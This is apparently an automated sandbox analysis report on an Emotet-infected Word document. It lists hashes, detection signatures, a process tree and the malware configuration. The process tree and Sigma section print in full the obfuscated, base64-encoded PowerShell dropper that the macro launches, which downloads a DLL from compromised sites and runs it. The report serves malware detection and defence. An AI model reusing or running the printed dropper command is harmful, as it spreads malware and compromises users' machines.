Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report MAIL-0573188.doc

Overview

General Information

Sample Name:MAIL-0573188.doc
Analysis ID:337092
MD5:7ad5e41d03b2dfe72af417fa5b0cc164
SHA1:2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256:2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2412 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2420 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1976 cmdline: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2484 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2764 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2456 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.1f0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.1f0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                9.2.rundll32.exe.1b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  9.2.rundll32.exe.1b0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    13.2.rundll32.exe.1c0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQ